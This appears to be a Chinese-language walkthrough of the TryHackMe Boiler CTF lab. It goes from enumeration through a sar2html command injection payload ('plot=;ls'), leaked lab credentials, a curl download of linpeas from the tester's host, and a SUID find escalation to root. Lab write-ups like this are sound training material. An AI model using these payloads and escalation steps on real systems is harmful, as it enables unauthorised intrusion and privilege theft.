共计 7694 个字符,预计需要花费 20 分钟才能阅读完成。
服务发现
┌──(root💀kali)-[~/tryhackme/boilerctf]
└─# nmap -sV -Pn 10.10.109.157 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-30 02:04 EDT
Nmap scan report for 10.10.109.157
Host is up (0.31s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
10000/tcp open http MiniServ 1.930 (Webmin httpd)
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 892.53 seconds
服务剖析
开启了 ftp 服务,此版本没有比拟闻名的破绽
能够匿名登录
有一个暗藏文件 .info.txt
下载到本地待剖析
┌──(root💀kali)-[~/tryhackme/boilerctf]
└─# ftp 10.10.109.157
Connected to 10.10.109.157.
220 (vsFTPd 3.0.3)
Name (10.10.109.157:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (173.2989 kB/s)
ftp> bye
221 Goodbye.
文件内容应该是某种加密算法的密文:
┌──(root💀kali)-[~/tryhackme/boilerctf]
└─# cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
没发现 key,狐疑是凯撒加密,一个个测试,偏移位是:13
解密后的明文是:Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
如果 Enumeration
不是某种加密算法的 key, 那这个信息看起来没什么卵用。。。
80 端口是一个 http 服务,首页是一个 apache 首页
目录爆破
──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.109.157
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_|)
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521
Error Log: /root/dirsearch/logs/errors-21-09-30_02-01-47.log
Target: http://10.10.109.157
[02:01:47] Starting:
[02:01:49] 200 - 11KB - /
[02:01:56] 301 - 315B - /manual -> http://10.10.109.157/manual/
[02:02:13] 301 - 315B - /joomla -> http://10.10.109.157/joomla/
[02:07:02] 403 - 301B - /server-status
manual/ 是 apache 文档
持续爆破 joomla/
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.109.157/joomla
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_|)
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521
Error Log: /root/dirsearch/logs/errors-21-09-30_02-17-11.log
Target: http://10.10.109.157/joomla
[02:17:12] Starting:
[02:17:14] 200 - 12KB - /joomla/
[02:17:15] 301 - 322B - /joomla/images -> http://10.10.109.157/joomla/images/
[02:17:15] 301 - 323B - /joomla/modules -> http://10.10.109.157/joomla/modules/
[02:17:20] 301 - 325B - /joomla/templates -> http://10.10.109.157/joomla/templates/
[02:17:20] 301 - 321B - /joomla/tests -> http://10.10.109.157/joomla/tests/
[02:17:20] 301 - 319B - /joomla/bin -> http://10.10.109.157/joomla/bin/
[02:17:20] 301 - 321B - /joomla/media -> http://10.10.109.157/joomla/media/
[02:17:20] 301 - 323B - /joomla/plugins -> http://10.10.109.157/joomla/plugins/
[02:17:20] 301 - 324B - /joomla/includes -> http://10.10.109.157/joomla/includes/
[02:17:21] 301 - 324B - /joomla/language -> http://10.10.109.157/joomla/language/
[02:17:22] 301 - 326B - /joomla/components -> http://10.10.109.157/joomla/components/
[02:17:22] 301 - 321B - /joomla/cache -> http://10.10.109.157/joomla/cache/
[02:17:23] 301 - 325B - /joomla/libraries -> http://10.10.109.157/joomla/libraries/
[02:17:27] 301 - 328B - /joomla/installation -> http://10.10.109.157/joomla/installation/
[02:17:28] 301 - 321B - /joomla/build -> http://10.10.109.157/joomla/build/
[02:17:29] 301 - 319B - /joomla/tmp -> http://10.10.109.157/joomla/tmp/
[02:17:30] 301 - 323B - /joomla/layouts -> http://10.10.109.157/joomla/layouts/
[02:17:37] 301 - 329B - /joomla/administrator -> http://10.10.109.157/joomla/administrator/
[02:18:30] 301 - 319B - /joomla/cli -> http://10.10.109.157/joomla/cli/
[02:19:30] 301 - 322B - /joomla/_files -> http://10.10.109.157/joomla/_files/
这个内容就比拟丰盛了,一个个剖析
http://10.10.109.157/joomla/tests/
有文件遍历破绽
http://10.10.109.157/joomla/build/
有文件遍历破绽
http://10.10.109.157/joomla/tests/codeception/acceptance.suite.dist.yml
裸露默认账号密码 admin:admin
然而不能够登录后盾
http://10.10.109.157/joomla/build/jenkins/
底下有两个比拟敏感的文件文件:
文件:unit-tests.sh
#!/bin/bash
# Script for preparing the unit tests in Joomla!
# Path to the Joomla! installation
BASE="/opt/src"
until mysqladmin ping -h mysql --silent; do
sleep 1
done
>&2 echo "Mysql alive!"
until psql -h "postgres" -U "postgres" --quiet -o /dev/null -c '\l'; do
sleep 1
done
>&2 echo "Postgres alive!"
# Setup databases for testing
mysql -u root joomla_ut -h mysql -pjoomla_ut < "$BASE/tests/unit/schema/mysql.sql"
psql -c 'create database joomla_ut;' -U postgres -h "postgres" > /dev/null
psql -U "postgres" -h "postgres" -d joomla_ut -a -f "$BASE/tests/unit/schema/postgresql.sql" > /dev/null
echo "Testing $PHPVERSION"
phpunit -c $BASE/jenkins-phpunit.xml
文件:docker-compose.yml
version: '2'
services:
test:
image: joomlaprojects/docker-${PHPVERSION}
volumes:
- ../..:/opt/src
working_dir: /opt/src
depends_on:
- mysql
- memcached
- redis
- postgres
mysql:
image: mysql:5.7
restart: always
environment:
MYSQL_DATABASE: joomla_ut
MYSQL_USER: joomla_ut
MYSQL_PASSWORD: joomla_ut
MYSQL_ROOT_PASSWORD: joomla_ut
memcached:
image: memcached
redis:
image: redis
postgres:
image: postgres
泄露 mysql 登录凭证
http://10.10.109.157/joomla/administrator/
是 joomla! 的登录页面,cms 版本未知
http://10.10.109.157/joomla/_files/
页面有一个字符串
VjJodmNITnBaU0JrWVdsemVRbz0K
应该是被加密了,不晓得用的什么加密算法
10000 端口也是一个 http 服务,跑了一个 webmin,须要 https 拜访
这里找了良久,眼镜都花了, 瞄了一眼大佬的 walkthrough,原来还有个 _test
目录我没有扫描进去,尼玛。。。
http://10.10.109.157/joomla/_test
是一个 sar2html 程序,此程序存在近程执行破绽,见这里
咱们应用 payloadhttp://10.10.109.157/joomla/_test/index.php?plot=;ls%20-alh
而后点击select host
,在底下的 select 框里就会回显咱们的命令
期中有一个文件叫 log.txt,这个也是第七题的答案
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
拿到 ssh 凭证:basterd:superduperp@$$
user.txt 在 stoner 的目录下,看来要横向提权到 stoner
在 basterd 家目录有一个 backup.sh 文件, 源码如下,文件裸露了 stoner 的明码:superduperp@$$no1knows
$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [-d "$SOURCE"]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [-n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null`];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fi
切换 stoner,拿到 user flag:.secret
stoner@Vulnerable:/home$ cd stoner
stoner@Vulnerable:~$ ls
stoner@Vulnerable:~$ ls -alh
total 16K
drwxr-x--- 3 stoner stoner 4.0K Aug 22 2019 .
drwxr-xr-x 4 root root 4.0K Aug 22 2019 ..
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.
枚举提权破绽,因为不能应用 wget,用 curl 把 linpea 下载到本地:
curl -O http://10.13.21.169:8000/linpeas.sh
发现一个能够用于提权的 SUID:find
stoner@Vulnerable:~$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
uid=1000(stoner) gid=1000(stoner) euid=0(root) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?
#
拿到 root flag